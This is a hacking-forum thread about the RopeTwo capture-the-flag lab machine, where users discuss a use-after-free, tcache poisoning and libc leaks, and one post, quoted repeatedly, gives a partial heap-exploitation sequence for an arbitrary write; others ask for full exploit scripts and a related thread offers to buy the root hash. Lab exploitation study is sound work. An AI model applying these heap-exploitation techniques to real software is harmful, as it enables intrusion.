TUTORIAL RopeTwo
by Doop3r - December 05, 2020 at 06:50 PM
#13
(December 14, 2020 at 06:18 PM)biggy7 Wrote:
(December 14, 2020 at 07:58 AM)teksius Wrote:
(December 13, 2020 at 04:36 PM)biggy7 Wrote:
(December 06, 2020 at 08:12 PM)teksius Wrote:
(December 06, 2020 at 06:51 PM)mandoline Wrote: I'm not sure, but I think that there is an Use after free by adding a file and then edit it with a size of 0. But no idea how to proceed.

The main question is how to leak libc address.. Those, who know the answer, just say please: which function we need to dig? Or we need to go blind/bruteforce?
I don't know how to leak a libc, but did you get an arbitrary write primitive?
I can't get pass through 2 mallocs limitation to finish poisoning tcache.
Any ideas how to achieve it?
Yes, you can do it like this:

# Addr to 1st chunk
add('B', 20, 'AAAA')
edit('B', 0, "A")
edit('B', 20, TARGET)
add('A', 20, 'AAAAA')
edit('B', 100, 'AAA')
rm('B')

edit('A',112,'AAAA')
rm('A')

#Addr to 2nd chunk
add('A', 30, 'AAAA')
edit('A', 0, "A")
edit('A', 30, TARGET)
add('B', 30, 'AAAA')
edit('B', 50, 'AAAA')
rm('B')

edit('A',70,'AAAA')
rm('A')

#Write the value
add('A', 40, VALUE)
Thanks!
What is the goal of making 2 targets?
Actually, no need of 2nd target if you not planning use it in future. This code far from real exploit. The main question you need to concentrate - how to leak libc address. If you manage it, other is simple.
#14
(December 14, 2020 at 07:58 AM)teksius Wrote:
(December 13, 2020 at 04:36 PM)biggy7 Wrote:
(December 06, 2020 at 08:12 PM)teksius Wrote:
(December 06, 2020 at 06:51 PM)mandoline Wrote:
(December 06, 2020 at 06:41 PM)teksius Wrote: Yeap, I'm at the same point! Can't see any overflows there... Any nuges, guys?

I'm not sure, but I think that there is an Use after free by adding a file and then edit it with a size of 0. But no idea how to proceed.

The main question is how to leak libc address.. Those, who know the answer, just say please: which function we need to dig? Or we need to go blind/bruteforce?
I don't know how to leak a libc, but did you get an arbitrary write primitive?
I can't get pass through 2 mallocs limitation to finish poisoning tcache.
Any ideas how to achieve it?
Yes, you can do it like this:

# Addr to 1st chunk
add('B', 20, 'AAAA')
edit('B', 0, "A")
edit('B', 20, TARGET)
add('A', 20, 'AAAAA')
edit('B', 100, 'AAA')
rm('B')

edit('A',112,'AAAA')
rm('A')

#Addr to 2nd chunk
add('A', 30, 'AAAA')
edit('A', 0, "A")
edit('A', 30, TARGET)
add('B', 30, 'AAAA')
edit('B', 50, 'AAAA')
rm('B')

edit('A',70,'AAAA')
rm('A')

#Write the value
add('A', 40, VALUE)
I dont get an idea can you share little more please
#15
I did user also. But the kernel part on the root is driving me nuts
#16
Can someone share the script for user?
#17
(December 15, 2020 at 07:44 PM)teksius Wrote:
(December 14, 2020 at 06:18 PM)biggy7 Wrote:
(December 14, 2020 at 07:58 AM)teksius Wrote:
(December 13, 2020 at 04:36 PM)biggy7 Wrote:
(December 06, 2020 at 08:12 PM)teksius Wrote: The main question is how to leak libc address.. Those, who know the answer, just say please: which function we need to dig? Or we need to go blind/bruteforce?
I don't know how to leak a libc, but did you get an arbitrary write primitive?
I can't get pass through 2 mallocs limitation to finish poisoning tcache.
Any ideas how to achieve it?
Yes, you can do it like this:

# Addr to 1st chunk
add('B', 20, 'AAAA')
edit('B', 0, "A")
edit('B', 20, TARGET)
add('A', 20, 'AAAAA')
edit('B', 100, 'AAA')
rm('B')

edit('A',112,'AAAA')
rm('A')

#Addr to 2nd chunk
add('A', 30, 'AAAA')
edit('A', 0, "A")
edit('A', 30, TARGET)
add('B', 30, 'AAAA')
edit('B', 50, 'AAAA')
rm('B')

edit('A',70,'AAAA')
rm('A')

#Write the value
add('A', 40, VALUE)
Thanks!
What is the goal of making 2 targets?
Actually, no need of 2nd target if you not planning use it in future. This code far from real exploit. The main question you need to concentrate - how to leak libc address. If you manage it, other is simple.
given that root exploit's shared, what is the leak trick? did you create a fake non-tcache chunk?
#18
Hi, i can someone help me with the script please. I want to understand, how it works. Can someone share the script?
#19
(December 30, 2020 at 07:38 PM)ARhOmOuTEd Wrote: Hi, i can someone help me with the script please. I want to understand, how it works. Can someone share the script?
which script?, can you elaborate what do you want?
#20
(December 31, 2020 at 05:36 AM)terobau Wrote:
(December 30, 2020 at 07:38 PM)ARhOmOuTEd Wrote: Hi, i can someone help me with the script please. I want to understand, how it works. Can someone share the script?
which script?, can you elaborate what do you want?

He means the script to pwn r4j

the UAF exploitation

Rop2 gonna retire soon

So can u release that now as a New year gift :D

*) Script to pwn r4j
*) Script to exploit the ralloc kernal

Or writeup would be even better :D

Thanks in Advance and Happy New Year :)
#21
Bumping - did someone releases a walkthrough/solution for this a few weeks ago? There was a massive spike in owns.

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG RopeTwo hehe6873 0 260 April 02, 2021 at 05:25 AM
Last Post: hehe6873
BUYING ROPETWO ROOT HASH (Buying) 0xvijay 18 2,606 January 11, 2021 at 04:39 AM
Last Post: nero007
TUTORIAL RopeTwo[ROOT] terobau 16 2,248 December 25, 2020 at 08:30 AM
Last Post: z3uz

 Users browsing this thread: 1 Guest(s)